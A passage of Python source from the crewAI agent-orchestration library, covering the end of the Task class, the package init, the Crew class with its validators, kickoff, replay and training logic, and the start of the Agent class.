Tuple[Optional[BaseModel], Optional[Dict[str, Any]]]: pydantic_output: Optional[BaseModel] = None json_output: Optional[Dict[str, Any]] = None if self.output_pydantic or self.output_json: model_output = convert_to_model( result, self.output_pydantic, self.output_json, self.agent, self.converter_cls, ) if isinstance(model_output, BaseModel): pydantic_output = model_output elif isinstance(model_output, dict): json_output = model_output elif isinstance(model_output, str): try: json_output = json.loads(model_output) except json.JSONDecodeError: json_output = None return pydantic_output, json_output def _get_output_format(self) -> OutputFormat: if self.output_json: return OutputFormat.JSON if self.output_pydantic: return OutputFormat.PYDANTIC return OutputFormat.RAW def _save_file(self, result: Any) -> None: if self.output_file is None: raise ValueError("output_file is not set.") directory = os.path.dirname(self.output_file) # type: ignore # Value of type variable "AnyOrLiteralStr" of "dirname" cannot be "str | None" if directory and not os.path.exists(directory): os.makedirs(directory) with open(self.output_file, "w", encoding="utf-8") as file: if isinstance(result, dict): import json json.dump(result, file, ensure_ascii=False, indent=2) else: file.write(str(result)) return None def __repr__(self): return f"Task(description={self.description}, expected_output={self.expected_output})" File: src/crewai/__init__.py from crewai.agent import Agent from crewai.crew import Crew from crewai.pipeline import Pipeline from crewai.process import Process from crewai.routers import Router from crewai.task import Task __all__ = ["Agent", "Crew", "Process", "Task", "Pipeline", "Router"] File: src/crewai/crew.py import asyncio import json import os import uuid from concurrent.futures import Future from hashlib import md5 from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union from langchain_core.callbacks import BaseCallbackHandler from pydantic import ( UUID4, BaseModel, Field, InstanceOf, Json, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agent import Agent from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.agents.cache import CacheHandler from crewai.crews.crew_output import CrewOutput from crewai.memory.entity.entity_memory import EntityMemory from crewai.memory.long_term.long_term_memory import LongTermMemory from crewai.memory.short_term.short_term_memory import ShortTermMemory from crewai.process import Process from crewai.task import Task from crewai.tasks.conditional_task import ConditionalTask from crewai.tasks.task_output import TaskOutput from crewai.telemetry import Telemetry from crewai.tools.agent_tools import AgentTools from crewai.types.usage_metrics import UsageMetrics from crewai.utilities import I18N, FileHandler, Logger, RPMController from crewai.utilities.constants import ( TRAINING_DATA_FILE, ) from crewai.utilities.evaluators.crew_evaluator_handler import CrewEvaluator from crewai.utilities.evaluators.task_evaluator import TaskEvaluator from crewai.utilities.formatter import ( aggregate_raw_outputs_from_task_outputs, aggregate_raw_outputs_from_tasks, ) from crewai.utilities.planning_handler import CrewPlanner from crewai.utilities.task_output_storage_handler import TaskOutputStorageHandler from crewai.utilities.training_handler import CrewTrainingHandler agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore except ImportError: pass if TYPE_CHECKING: from crewai.pipeline.pipeline import Pipeline class Crew(BaseModel): """ Represents a group of agents, defining how they should collaborate and the tasks they should perform. Attributes: tasks: List of tasks assigned to the crew. agents: List of agents part of this crew. manager_llm: The language model that will run manager agent. manager_agent: Custom agent that will be used as manager. memory: Whether the crew should use memory to store memories of it's execution. manager_callbacks: The callback handlers to be executed by the manager agent when hierarchical process is used cache: Whether the crew should use a cache to store the results of the tools execution. function_calling_llm: The language model that will run the tool calling for all the agents. process: The process flow that the crew will follow (e.g., sequential, hierarchical). verbose: Indicates the verbosity level for logging during execution. config: Configuration settings for the crew. max_rpm: Maximum number of requests per minute for the crew execution to be respected. prompt_file: Path to the prompt json file to be used for the crew. id: A unique identifier for the crew instance. task_callback: Callback to be executed after each task for every agents execution. step_callback: Callback to be executed after each step for every agents execution. share_crew: Whether you want to share the complete crew information and execution with crewAI to make the library better, and allow us to train models. planning: Plan the crew execution and add the plan to the crew. """ __hash__ = object.__hash__ # type: ignore _execution_span: Any = PrivateAttr() _rpm_controller: RPMController = PrivateAttr() _logger: Logger = PrivateAttr() _file_handler: FileHandler = PrivateAttr() _cache_handler: InstanceOf[CacheHandler] = PrivateAttr(default=CacheHandler()) _short_term_memory: Optional[InstanceOf[ShortTermMemory]] = PrivateAttr() _long_term_memory: Optional[InstanceOf[LongTermMemory]] = PrivateAttr() _entity_memory: Optional[InstanceOf[EntityMemory]] = PrivateAttr() _train: Optional[bool] = PrivateAttr(default=False) _train_iteration: Optional[int] = PrivateAttr() _inputs: Optional[Dict[str, Any]] = PrivateAttr(default=None) _logging_color: str = PrivateAttr( default="bold_purple", ) _task_output_handler: TaskOutputStorageHandler = PrivateAttr( default_factory=TaskOutputStorageHandler ) name: Optional[str] = Field(default=None) cache: bool = Field(default=True) tasks: List[Task] = Field(default_factory=list) agents: List[BaseAgent] = Field(default_factory=list) process: Process = Field(default=Process.sequential) verbose: bool = Field(default=False) memory: bool = Field( default=False, description="Whether the crew should use memory to store memories of it's execution", ) embedder: Optional[dict] = Field( default={"provider": "openai"}, description="Configuration for the embedder to be used for the crew.", ) usage_metrics: Optional[UsageMetrics] = Field( default=None, description="Metrics for the LLM usage during all tasks execution.", ) manager_llm: Optional[Any] = Field( description="Language model that will run the agent.", default=None ) manager_agent: Optional[BaseAgent] = Field( description="Custom agent that will be used as manager.", default=None ) manager_callbacks: Optional[List[InstanceOf[BaseCallbackHandler]]] = Field( default=None, description="A list of callback handlers to be executed by the manager agent when hierarchical process is used", ) function_calling_llm: Optional[Any] = Field( description="Language model that will run the agent.", default=None ) config: Optional[Union[Json, Dict[str, Any]]] = Field(default=None) id: UUID4 = Field(default_factory=uuid.uuid4, frozen=True) share_crew: Optional[bool] = Field(default=False) step_callback: Optional[Any] = Field( default=None, description="Callback to be executed after each step for all agents execution.", ) task_callback: Optional[Any] = Field( default=None, description="Callback to be executed after each task for all agents execution.", ) max_rpm: Optional[int] = Field( default=None, description="Maximum number of requests per minute for the crew execution to be respected.", ) prompt_file: str = Field( default=None, description="Path to the prompt json file to be used for the crew.", ) output_log_file: Optional[str] = Field( default=None, description="output_log_file", ) planning: Optional[bool] = Field( default=False, description="Plan the crew execution and add the plan to the crew.", ) planning_llm: Optional[Any] = Field( default=None, description="Language model that will run the AgentPlanner if planning is True.", ) task_execution_output_json_files: Optional[List[str]] = Field( default=None, description="List of file paths for task execution JSON files.", ) execution_logs: List[Dict[str, Any]] = Field( default=[], description="List of execution logs for tasks", ) @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: """Prevent manual setting of the 'id' field by users.""" if v: raise PydanticCustomError( "may_not_set_field", "The 'id' field cannot be set by the user.", {} ) @field_validator("config", mode="before") @classmethod def check_config_type( cls, v: Union[Json, Dict[str, Any]] ) -> Union[Json, Dict[str, Any]]: """Validates that the config is a valid type. Args: v: The config to be validated. Returns: The config if it is valid. """ # TODO: Improve typing return json.loads(v) if isinstance(v, Json) else v # type: ignore @model_validator(mode="after") def set_private_attrs(self) -> "Crew": """Set private attributes.""" self._cache_handler = CacheHandler() self._logger = Logger(verbose=self.verbose) if self.output_log_file: self._file_handler = FileHandler(self.output_log_file) self._rpm_controller = RPMController(max_rpm=self.max_rpm, logger=self._logger) self._telemetry = Telemetry() self._telemetry.set_tracer() return self @model_validator(mode="after") def create_crew_memory(self) -> "Crew": """Set private attributes.""" if self.memory: self._long_term_memory = LongTermMemory() self._short_term_memory = ShortTermMemory( crew=self, embedder_config=self.embedder ) self._entity_memory = EntityMemory(crew=self, embedder_config=self.embedder) return self @model_validator(mode="after") def check_manager_llm(self): """Validates that the language model is set when using hierarchical process.""" if self.process == Process.hierarchical: if not self.manager_llm and not self.manager_agent: raise PydanticCustomError( "missing_manager_llm_or_manager_agent", "Attribute `manager_llm` or `manager_agent` is required when using hierarchical process.", {}, ) if (self.manager_agent is not None) and ( self.agents.count(self.manager_agent) > 0 ): raise PydanticCustomError( "manager_agent_in_agents", "Manager agent should not be included in agents list.", {}, ) return self @model_validator(mode="after") def check_config(self): """Validates that the crew is properly configured with agents and tasks.""" if not self.config and not self.tasks and not self.agents: raise PydanticCustomError( "missing_keys", "Either 'agents' and 'tasks' need to be set or 'config'.", {}, ) if self.config: self._setup_from_config() if self.agents: for agent in self.agents: if self.cache: agent.set_cache_handler(self._cache_handler) if self.max_rpm: agent.set_rpm_controller(self._rpm_controller) return self @model_validator(mode="after") def validate_tasks(self): if self.process == Process.sequential: for task in self.tasks: if task.agent is None: raise PydanticCustomError( "missing_agent_in_task", f"Sequential process error: Agent is missing in the task with the following description: {task.description}", # type: ignore # Argument of type "str" cannot be assigned to parameter "message_template" of type "LiteralString" {}, ) return self @model_validator(mode="after") def validate_end_with_at_most_one_async_task(self): """Validates that the crew ends with at most one asynchronous task.""" final_async_task_count = 0 # Traverse tasks backward for task in reversed(self.tasks): if task.async_execution: final_async_task_count += 1 else: break # Stop traversing as soon as a non-async task is encountered if final_async_task_count > 1: raise PydanticCustomError( "async_task_count", "The crew must end with at most one asynchronous task.", {}, ) return self @model_validator(mode="after") def validate_first_task(self) -> "Crew": """Ensure the first task is not a ConditionalTask.""" if self.tasks and isinstance(self.tasks[0], ConditionalTask): raise PydanticCustomError( "invalid_first_task", "The first task cannot be a ConditionalTask.", {}, ) return self @model_validator(mode="after") def validate_async_tasks_not_async(self) -> "Crew": """Ensure that ConditionalTask is not async.""" for task in self.tasks: if task.async_execution and isinstance(task, ConditionalTask): raise PydanticCustomError( "invalid_async_conditional_task", f"Conditional Task: {task.description} , cannot be executed asynchronously.", # type: ignore # Argument of type "str" cannot be assigned to parameter "message_template" of type "LiteralString" {}, ) return self @model_validator(mode="after") def validate_async_task_cannot_include_sequential_async_tasks_in_context(self): """ Validates that if a task is set to be executed asynchronously, it cannot include other asynchronous tasks in its context unless separated by a synchronous task. """ for i, task in enumerate(self.tasks): if task.async_execution and task.context: for context_task in task.context: if context_task.async_execution: for j in range(i - 1, -1, -1): if self.tasks[j] == context_task: raise ValueError( f"Task '{task.description}' is asynchronous and cannot include other sequential asynchronous tasks in its context." ) if not self.tasks[j].async_execution: break return self @model_validator(mode="after") def validate_context_no_future_tasks(self): """Validates that a task's context does not include future tasks.""" task_indices = {id(task): i for i, task in enumerate(self.tasks)} for task in self.tasks: if task.context: for context_task in task.context: if id(context_task) not in task_indices: continue # Skip context tasks not in the main tasks list if task_indices[id(context_task)] > task_indices[id(task)]: raise ValueError( f"Task '{task.description}' has a context dependency on a future task '{context_task.description}', which is not allowed." ) return self @property def key(self) -> str: source = [agent.key for agent in self.agents] + [ task.key for task in self.tasks ] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() def _setup_from_config(self): assert self.config is not None, "Config should not be None." """Initializes agents and tasks from the provided config.""" if not self.config.get("agents") or not self.config.get("tasks"): raise PydanticCustomError( "missing_keys_in_config", "Config should have 'agents' and 'tasks'.", {} ) self.process = self.config.get("process", self.process) self.agents = [Agent(**agent) for agent in self.config["agents"]] self.tasks = [self._create_task(task) for task in self.config["tasks"]] def _create_task(self, task_config: Dict[str, Any]) -> Task: """Creates a task instance from its configuration. Args: task_config: The configuration of the task. Returns: A task instance. """ task_agent = next( agt for agt in self.agents if agt.role == task_config["agent"] ) del task_config["agent"] return Task(**task_config, agent=task_agent) def _setup_for_training(self, filename: str) -> None: """Sets up the crew for training.""" self._train = True for task in self.tasks: task.human_input = True for agent in self.agents: agent.allow_delegation = False CrewTrainingHandler(TRAINING_DATA_FILE).initialize_file() CrewTrainingHandler(filename).initialize_file() def train( self, n_iterations: int, filename: str, inputs: Optional[Dict[str, Any]] = {} ) -> None: """Trains the crew for a given number of iterations.""" self._setup_for_training(filename) for n_iteration in range(n_iterations): self._train_iteration = n_iteration self.kickoff(inputs=inputs) training_data = CrewTrainingHandler(TRAINING_DATA_FILE).load() for agent in self.agents: result = TaskEvaluator(agent).evaluate_training_data( training_data=training_data, agent_id=str(agent.id) ) CrewTrainingHandler(filename).save_trained_data( agent_id=str(agent.role), trained_data=result.model_dump() ) def kickoff( self, inputs: Optional[Dict[str, Any]] = None, ) -> CrewOutput: """Starts the crew to work on its assigned tasks.""" self._execution_span = self._telemetry.crew_execution_span(self, inputs) self._task_output_handler.reset() self._logging_color = "bold_purple" if inputs is not None: self._inputs = inputs self._interpolate_inputs(inputs) self._set_tasks_callbacks() i18n = I18N(prompt_file=self.prompt_file) for agent in self.agents: agent.i18n = i18n # type: ignore[attr-defined] # Argument 1 to "_interpolate_inputs" of "Crew" has incompatible type "dict[str, Any] | None"; expected "dict[str, Any]" agent.crew = self # type: ignore[attr-defined] # TODO: Create an AgentFunctionCalling protocol for future refactoring if not agent.function_calling_llm: # type: ignore # "BaseAgent" has no attribute "function_calling_llm" agent.function_calling_llm = self.function_calling_llm # type: ignore # "BaseAgent" has no attribute "function_calling_llm" if agent.allow_code_execution: # type: ignore # BaseAgent" has no attribute "allow_code_execution" agent.tools += agent.get_code_execution_tools() # type: ignore # "BaseAgent" has no attribute "get_code_execution_tools"; maybe "get_delegation_tools"? if not agent.step_callback: # type: ignore # "BaseAgent" has no attribute "step_callback" agent.step_callback = self.step_callback # type: ignore # "BaseAgent" has no attribute "step_callback" agent.create_agent_executor() if self.planning: self._handle_crew_planning() metrics: List[UsageMetrics] = [] if self.process == Process.sequential: result = self._run_sequential_process() elif self.process == Process.hierarchical: result = self._run_hierarchical_process() else: raise NotImplementedError( f"The process '{self.process}' is not implemented yet." ) metrics += [agent._token_process.get_summary() for agent in self.agents] self.usage_metrics = UsageMetrics() for metric in metrics: self.usage_metrics.add_usage_metrics(metric) return result def kickoff_for_each(self, inputs: List[Dict[str, Any]]) -> List[CrewOutput]: """Executes the Crew's workflow for each input in the list and aggregates results.""" results: List[CrewOutput] = [] # Initialize the parent crew's usage metrics total_usage_metrics = UsageMetrics() for input_data in inputs: crew = self.copy() output = crew.kickoff(inputs=input_data) if crew.usage_metrics: total_usage_metrics.add_usage_metrics(crew.usage_metrics) results.append(output) self.usage_metrics = total_usage_metrics self._task_output_handler.reset() return results async def kickoff_async(self, inputs: Optional[Dict[str, Any]] = {}) -> CrewOutput: """Asynchronous kickoff method to start the crew execution.""" return await asyncio.to_thread(self.kickoff, inputs) async def kickoff_for_each_async(self, inputs: List[Dict]) -> List[CrewOutput]: crew_copies = [self.copy() for _ in inputs] async def run_crew(crew, input_data): return await crew.kickoff_async(inputs=input_data) tasks = [ asyncio.create_task(run_crew(crew_copies[i], inputs[i])) for i in range(len(inputs)) ] tasks = [ asyncio.create_task(run_crew(crew_copies[i], inputs[i])) for i in range(len(inputs)) ] results = await asyncio.gather(*tasks) total_usage_metrics = UsageMetrics() for crew in crew_copies: if crew.usage_metrics: total_usage_metrics.add_usage_metrics(crew.usage_metrics) self.usage_metrics = total_usage_metrics self._task_output_handler.reset() return results def _handle_crew_planning(self): """Handles the Crew planning.""" self._logger.log("info", "Planning the crew execution") result = CrewPlanner( tasks=self.tasks, planning_agent_llm=self.planning_llm )._handle_crew_planning() for task, step_plan in zip(self.tasks, result.list_of_plans_per_task): task.description += step_plan.plan def _store_execution_log( self, task: Task, output: TaskOutput, task_index: int, was_replayed: bool = False, ): if self._inputs: inputs = self._inputs else: inputs = {} log = { "task": task, "output": { "description": output.description, "summary": output.summary, "raw": output.raw, "pydantic": output.pydantic, "json_dict": output.json_dict, "output_format": output.output_format, "agent": output.agent, }, "task_index": task_index, "inputs": inputs, "was_replayed": was_replayed, } self._task_output_handler.update(task_index, log) def _run_sequential_process(self) -> CrewOutput: """Executes tasks sequentially and returns the final output.""" return self._execute_tasks(self.tasks) def _run_hierarchical_process(self) -> CrewOutput: """Creates and assigns a manager agent to make sure the crew completes the tasks.""" self._create_manager_agent() return self._execute_tasks(self.tasks) def _create_manager_agent(self): i18n = I18N(prompt_file=self.prompt_file) if self.manager_agent is not None: self.manager_agent.allow_delegation = True manager = self.manager_agent if manager.tools is not None and len(manager.tools) > 0: self._logger.log( "warning", "Manager agent should not have tools", color="orange" ) manager.tools = [] manager.tools = self.manager_agent.get_delegation_tools(self.agents) else: manager = Agent( role=i18n.retrieve("hierarchical_manager_agent", "role"), goal=i18n.retrieve("hierarchical_manager_agent", "goal"), backstory=i18n.retrieve("hierarchical_manager_agent", "backstory"), tools=AgentTools(agents=self.agents).tools(), llm=self.manager_llm, verbose=self.verbose, ) self.manager_agent = manager def _execute_tasks( self, tasks: List[Task], start_index: Optional[int] = 0, was_replayed: bool = False, ) -> CrewOutput: """Executes tasks sequentially and returns the final output. Args: tasks (List[Task]): List of tasks to execute manager (Optional[BaseAgent], optional): Manager agent to use for delegation. Defaults to None. Returns: CrewOutput: Final output of the crew """ task_outputs: List[TaskOutput] = [] futures: List[Tuple[Task, Future[TaskOutput], int]] = [] last_sync_output: Optional[TaskOutput] = None for task_index, task in enumerate(tasks): if start_index is not None and task_index < start_index: if task.output: if task.async_execution: task_outputs.append(task.output) else: task_outputs = [task.output] last_sync_output = task.output continue agent_to_use = self._get_agent_to_use(task) if agent_to_use is None: raise ValueError( f"No agent available for task: {task.description}. Ensure that either the task has an assigned agent or a manager agent is provided." ) self._prepare_agent_tools(task) self._log_task_start(task, agent_to_use.role) if isinstance(task, ConditionalTask): skipped_task_output = self._handle_conditional_task( task, task_outputs, futures, task_index, was_replayed ) if skipped_task_output: continue if task.async_execution: context = self._get_context( task, [last_sync_output] if last_sync_output else [] ) future = task.execute_async( agent=agent_to_use, context=context, tools=agent_to_use.tools, ) futures.append((task, future, task_index)) else: if futures: task_outputs = self._process_async_tasks(futures, was_replayed) futures.clear() context = self._get_context(task, task_outputs) task_output = task.execute_sync( agent=agent_to_use, context=context, tools=agent_to_use.tools, ) task_outputs = [task_output] self._process_task_result(task, task_output) self._store_execution_log(task, task_output, task_index, was_replayed) if futures: task_outputs = self._process_async_tasks(futures, was_replayed) return self._create_crew_output(task_outputs) def _handle_conditional_task( self, task: ConditionalTask, task_outputs: List[TaskOutput], futures: List[Tuple[Task, Future[TaskOutput], int]], task_index: int, was_replayed: bool, ) -> Optional[TaskOutput]: if futures: task_outputs = self._process_async_tasks(futures, was_replayed) futures.clear() previous_output = task_outputs[task_index - 1] if task_outputs else None if previous_output is not None and not task.should_execute(previous_output): self._logger.log( "debug", f"Skipping conditional task: {task.description}", color="yellow", ) skipped_task_output = task.get_skipped_task_output() if not was_replayed: self._store_execution_log(task, skipped_task_output, task_index) return skipped_task_output return None def _prepare_agent_tools(self, task: Task): if self.process == Process.hierarchical: if self.manager_agent: self._update_manager_tools(task) else: raise ValueError("Manager agent is required for hierarchical process.") elif task.agent and task.agent.allow_delegation: self._add_delegation_tools(task) def _get_agent_to_use(self, task: Task) -> Optional[BaseAgent]: if self.process == Process.hierarchical: return self.manager_agent return task.agent def _add_delegation_tools(self, task: Task): agents_for_delegation = [agent for agent in self.agents if agent != task.agent] if len(self.agents) > 1 and len(agents_for_delegation) > 0 and task.agent: delegation_tools = task.agent.get_delegation_tools(agents_for_delegation) # Add tools if they are not already in task.tools for new_tool in delegation_tools: # Find the index of the tool with the same name existing_tool_index = next( ( index for index, tool in enumerate(task.tools or []) if tool.name == new_tool.name ), None, ) if not task.tools: task.tools = [] if existing_tool_index is not None: # Replace the existing tool task.tools[existing_tool_index] = new_tool else: # Add the new tool task.tools.append(new_tool) def _log_task_start(self, task: Task, role: str = "None"): color = self._logging_color self._logger.log("debug", f"== Working Agent: {role}", color=color) self._logger.log("info", f"== Starting Task: {task.description}", color=color) if self.output_log_file: self._file_handler.log(agent=role, task=task.description, status="started") def _update_manager_tools(self, task: Task): if self.manager_agent: if task.agent: self.manager_agent.tools = task.agent.get_delegation_tools([task.agent]) else: self.manager_agent.tools = self.manager_agent.get_delegation_tools( self.agents ) def _get_context(self, task: Task, task_outputs: List[TaskOutput]): context = ( aggregate_raw_outputs_from_tasks(task.context) if task.context else aggregate_raw_outputs_from_task_outputs(task_outputs) ) return context def _process_task_result(self, task: Task, output: TaskOutput) -> None: role = task.agent.role if task.agent is not None else "None" self._logger.log("debug", f"== [{role}] Task output: {output}\n\n") if self.output_log_file: self._file_handler.log(agent=role, task=output, status="completed") def _create_crew_output(self, task_outputs: List[TaskOutput]) -> CrewOutput: if len(task_outputs) != 1: raise ValueError( "Something went wrong. Kickoff should return only one task output." ) final_task_output = task_outputs[0] final_string_output = final_task_output.raw self._finish_execution(final_string_output) token_usage = self.calculate_usage_metrics() return CrewOutput( raw=final_task_output.raw, pydantic=final_task_output.pydantic, json_dict=final_task_output.json_dict, tasks_output=[task.output for task in self.tasks if task.output], token_usage=token_usage, ) def _process_async_tasks( self, futures: List[Tuple[Task, Future[TaskOutput], int]], was_replayed: bool = False, ) -> List[TaskOutput]: task_outputs: List[TaskOutput] = [] for future_task, future, task_index in futures: task_output = future.result() task_outputs.append(task_output) self._process_task_result(future_task, task_output) self._store_execution_log( future_task, task_output, task_index, was_replayed ) return task_outputs def _find_task_index( self, task_id: str, stored_outputs: List[Any] ) -> Optional[int]: return next( ( index for (index, d) in enumerate(stored_outputs) if d["task_id"] == str(task_id) ), None, ) def replay( self, task_id: str, inputs: Optional[Dict[str, Any]] = None ) -> CrewOutput: stored_outputs = self._task_output_handler.load() if not stored_outputs: raise ValueError(f"Task with id {task_id} not found in the crew's tasks.") start_index = self._find_task_index(task_id, stored_outputs) if start_index is None: raise ValueError(f"Task with id {task_id} not found in the crew's tasks.") replay_inputs = ( inputs if inputs is not None else stored_outputs[start_index]["inputs"] ) self._inputs = replay_inputs if replay_inputs: self._interpolate_inputs(replay_inputs) if self.process == Process.hierarchical: self._create_manager_agent() for i in range(start_index): stored_output = stored_outputs[i][ "output" ] # for adding context to the task task_output = TaskOutput( description=stored_output["description"], agent=stored_output["agent"], raw=stored_output["raw"], pydantic=stored_output["pydantic"], json_dict=stored_output["json_dict"], output_format=stored_output["output_format"], ) self.tasks[i].output = task_output self._logging_color = "bold_blue" result = self._execute_tasks(self.tasks, start_index, True) return result def copy(self): """Create a deep copy of the Crew.""" exclude = { "id", "_rpm_controller", "_logger", "_execution_span", "_file_handler", "_cache_handler", "_short_term_memory", "_long_term_memory", "_entity_memory", "_telemetry", "agents", "tasks", } cloned_agents = [agent.copy() for agent in self.agents] cloned_tasks = [task.copy(cloned_agents) for task in self.tasks] copied_data = self.model_dump(exclude=exclude) copied_data = {k: v for k, v in copied_data.items() if v is not None} copied_data.pop("agents", None) copied_data.pop("tasks", None) copied_crew = Crew(**copied_data, agents=cloned_agents, tasks=cloned_tasks) return copied_crew def _set_tasks_callbacks(self) -> None: """Sets callback for every task suing task_callback""" for task in self.tasks: if not task.callback: task.callback = self.task_callback def _interpolate_inputs(self, inputs: Dict[str, Any]) -> None: """Interpolates the inputs in the tasks and agents.""" [ task.interpolate_inputs( # type: ignore # "interpolate_inputs" of "Task" does not return a value (it only ever returns None) inputs ) for task in self.tasks ] # type: ignore # "interpolate_inputs" of "Agent" does not return a value (it only ever returns None) for agent in self.agents: agent.interpolate_inputs(inputs) def _finish_execution(self, final_string_output: str) -> None: if self.max_rpm: self._rpm_controller.stop_rpm_counter() if agentops: agentops.end_session( end_state="Success", end_state_reason="Finished Execution", ) self._telemetry.end_crew(self, final_string_output) def calculate_usage_metrics(self) -> UsageMetrics: """Calculates and returns the usage metrics.""" total_usage_metrics = UsageMetrics() for agent in self.agents: if hasattr(agent, "_token_process"): token_sum = agent._token_process.get_summary() total_usage_metrics.add_usage_metrics(token_sum) if self.manager_agent and hasattr(self.manager_agent, "_token_process"): token_sum = self.manager_agent._token_process.get_summary() total_usage_metrics.add_usage_metrics(token_sum) return total_usage_metrics def test( self, n_iterations: int, openai_model_name: str, inputs: Optional[Dict[str, Any]] = None, ) -> None: """Test and evaluate the Crew with the given inputs for n iterations.""" self._test_execution_span = self._telemetry.test_execution_span( self, n_iterations, inputs, openai_model_name ) evaluator = CrewEvaluator(self, openai_model_name) for i in range(1, n_iterations + 1): evaluator.set_iteration(i) self.kickoff(inputs=inputs) evaluator.print_crew_evaluation_result() def __rshift__(self, other: "Crew") -> "Pipeline": """ Implements the >> operator to add another Crew to an existing Pipeline. """ from crewai.pipeline.pipeline import Pipeline if not isinstance(other, Crew): raise TypeError( f"Unsupported operand type for >>: '{type(self).__name__}' and '{type(other).__name__}'" ) return Pipeline(stages=[self, other]) def __repr__(self): return f"Crew(id={self.id}, process={self.process}, number_of_agents={len(self.agents)}, number_of_tasks={len(self.tasks)})" File: src/crewai/agent.py import os from inspect import signature from typing import Any, List, Optional, Tuple from langchain.agents.agent import RunnableAgent from langchain.agents.tools import BaseTool from langchain.agents.tools import tool as LangChainTool from langchain_core.agents import AgentAction from langchain_core.callbacks import BaseCallbackHandler from langchain_openai import ChatOpenAI from pydantic import Field, InstanceOf, PrivateAttr, model_validator from crewai.agents import CacheHandler, CrewAgentExecutor, CrewAgentParser from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.memory.contextual.contextual_memory import ContextualMemory from crewai.tools.agent_tools import AgentTools from crewai.utilities import Converter, Prompts from crewai.utilities.constants import TRAINED_AGENTS_DATA_FILE, TRAINING_DATA_FILE from crewai.utilities.token_counter_callback import TokenCalcHandler from crewai.utilities.training_handler import CrewTrainingHandler def mock_agent_ops_provider(): def track_agent(*args, **kwargs): def noop(f): return f return noop return track_agent agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore # Name "agentops" already defined on line 21 from agentops import track_agent except ImportError: track_agent = mock_agent_ops_provider() else: track_agent = mock_agent_ops_provider() @track_agent() class Agent(BaseAgent): """Represents an agent in a system. Each agent has a role, a goal, a backstory, and an optional language model (llm). The agent can also have memory, can operate in verbose mode, and can delegate tasks to other agents. Attributes: agent_executor: An instance of the CrewAgentExecutor class. role: The role of the agent. goal: The objective of the agent. backstory: The backstory of the agent. config: Dict representation of agent configuration. llm: The language model that will run the agent. function_calling_llm: The language model that will handle the tool calling for this agent, it overrides the crew function_calling_llm. max_iter: Maximum number of iterations for an agent to execute a task. memory: Whether the agent should have memory or not. max_rpm: Maximum number of requests per minute for the agent execution to be respected. verbose: Whether the agent execution should be in verbose mode. allow_delegation: Whether the agent is allowed to delegate tasks to other agents. tools: Tools at agents disposal step_callback: Callback to be executed after each step of the agent execution. callbacks: A list of callback functions from the langchain library that are triggered during the agent's execution process """ _times_executed: int = PrivateAttr(default=0) max_execution_time: Optional[int] = Field( default=None, description="Maximum execution time for an agent to execute a task", ) agent_ops_agent_name: str = None # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str") agent_ops_agent_id: str = None # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str") cache_handler: InstanceOf[CacheHandler] = Field( default=None, description="An instance of the CacheHandler class." ) step_callback: Optional[Any] = Field( default=None, description="Callback to be executed after each step of the agent execution.", ) llm: Any = Field( default_factory=lambda: ChatOpenAI( model=os.environ.get("OPENAI_MODEL_NAME", "gpt-4o") ), description="Language model that will run the agent.", ) function_calling_llm: Optional[Any] = Field( description="Language model that will run the agent.", default=None ) callbacks: Optional[List[InstanceOf[BaseCallbackHandler]]] = Field( default=None, description="Callback to be executed" ) system_template: Optional[str] = Field( default=None, description="System format for the agent." ) prompt_template: Optional[str] = Field( default=None, description="Prompt format for the agent." ) response_template: Optional[str] = Field( default=None, description="Response format for the agent." ) tools_results: Optional[List[Any]] = Field( default=[], description="Results of the tools used by the agent." ) allow_code_execution: Optional[bool] = Field( default=False, description="Enable code execution for the agent." ) max_retry_limit: int = Field( default=2, description="Maximum number of retries for an agent to execute a task when an error occurs.", ) @model_validator(mode="after") def post_init_setup(self): self.agent_ops_agent_name = self.role # Different llms store the model name in different attributes model_name = getattr(self.llm, "model_name", None) or getattr( self.llm, "deployment_name", None ) if model_name: self._setup_llm_callbacks(model_name) if not self.agent_executor: self._setup_agent_executor() return self def _setup_llm_callbacks(self, model_name: str): token_handler = TokenCalcHandler(model_name, self._token_process) if not isinstance(self.llm.callbacks, list): self.llm.callbacks = [] if not any( isinstance(handler, TokenCalcHandler) for handler in self.llm.callbacks ): self.llm.callbacks.append(token_handler) if agentops and not any( isinstance(handler, agentops.LangchainCallbackHandler) for handler in self.llm.callbacks ): agentops.stop_instrumenting() self.llm.callbacks.append(agentops.LangchainCallbackHandler()) def _setup_agent_executor(self): if not self.cache_handler: self.cache_handler = CacheHandler() self.set_cache_handler(self.cache_handler) def execute_task( self, task: Any, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> str: """Execute a task with the agent. Args: task: Task to execute. context: Context to execute the task in. tools: Tools to use for the task. Returns: Output of the agent """ if self.tools_handler: self.tools_handler.last_used_tool = {} # type: ignore # Incompatible types in assignment (expression has type "dict[Never, Never]", variable has type "ToolCalling") task_prompt = task.prompt() if context: task_prompt = self.i18n.slice("task_with_context").format( task=task_prompt, context=context ) if self.crew and self.crew.memory: contextual_memory = ContextualMemory( self.crew._short_term_memory, self.crew._long_term_memory, self.crew._entity_memory, ) memory = contextual_memory.build_context_for_task(task, context) if memory.strip() != "": task_prompt += self.i18n.slice("memory").format(memory=memory) tools = tools or self.tools or [] parsed_tools = self._parse_tools(tools) self.create_agent_executor(tools=tools) self.agent_executor.tools = parsed_tools self.agent_executor.task = task self.agent_executor.tools_description = self._render_text_description_and_args( parsed_tools ) self.agent_executor.tools_names = self.__tools_names(parsed_tools) if self.crew and self.crew._train: task_prompt = self._training_handler(task_prompt=task_prompt) else: task_prompt = self._use_trained_data(task_prompt=task_prompt) try: result = self.agent_executor.invoke( { "input": task_prompt, "tool_names": self.agent_executor.tools_names, "tools": self.agent_executor.tools_description, } )["output"] except Exception as e: self._times_executed += 1 if self._times_executed > self.max_retry_limit: raise e result = self.execute_task(task, context, tools) if self.max_rpm and self._rpm_controller: self._rpm_controller.stop_rpm_counter() # If there was any tool in self.tools_results that had result_as_answer # set to True, return the results of the last tool that had # result_as_answer set to True for tool_result in self.tools_results: # type: ignore # Item "None" of "list[Any] | None" has no attribute "__iter__" (not iterable) if 